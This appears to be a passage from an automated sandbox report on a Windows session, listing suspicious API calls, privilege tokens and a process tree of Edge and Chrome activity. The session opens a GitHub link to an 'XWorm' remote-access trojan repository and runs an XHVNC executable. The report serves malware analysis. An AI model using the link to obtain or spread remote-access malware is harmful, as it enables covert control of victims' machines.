1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

Processes:

chrome.exe

pid	process
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

MicrosoftEdgeCP.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	856	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	856	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	856	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	856	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe
Token: SeShutdownPrivilege	3244	chrome.exe
Token: SeCreatePagefilePrivilege	3244	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
3244	chrome.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe
4104	taskmgr.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeXHVNC.exewsappx.exeOpenWith.exeOpenWith.exe

pid	process
2220	MicrosoftEdge.exe
1784	MicrosoftEdgeCP.exe
856	MicrosoftEdgeCP.exe
1784	MicrosoftEdgeCP.exe
4904	MicrosoftEdgeCP.exe
4904	MicrosoftEdgeCP.exe
5400	XHVNC.exe
5400	XHVNC.exe
6140	wsappx.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
5444	OpenWith.exe
6052	OpenWith.exe
6052	OpenWith.exe
6052	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

MicrosoftEdgeCP.exechrome.exe

description	pid	process	target process
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4244	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 1784 wrote to memory of 4604	1784	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3244 wrote to memory of 1600	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 1600	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3456	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3916	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 3916	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 2116	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 2116	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 2116	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 2116	3244	chrome.exe	chrome.exe
PID 3244 wrote to memory of 2116	3244	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-"
1⤵
PID:2216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2220

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:856

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1744

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3276

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffe5fe9758,0x7fffe5fe9768,0x7fffe5fe9778
2⤵
PID:1600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:2
2⤵
PID:3456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1764 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:3916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:2116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3092 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4396 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4620 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4752 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4808 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4616 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4616 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5012 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3184 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4852 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4544 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4964 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5672 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3096 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5680 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5148 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5452 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6224 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5436

C:\Users\Admin\Downloads\dotnetfx45_full_setup.exe
"C:\Users\Admin\Downloads\dotnetfx45_full_setup.exe"
2⤵
- Executes dropped EXE
PID:5896

C:\daace83fb279d8d09e97d2\Setup.exe
C:\daace83fb279d8d09e97d2\\Setup.exe /x86 /x64 /web
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:4724

C:\Program Files\Google\Chrome\Application\chrome.exe
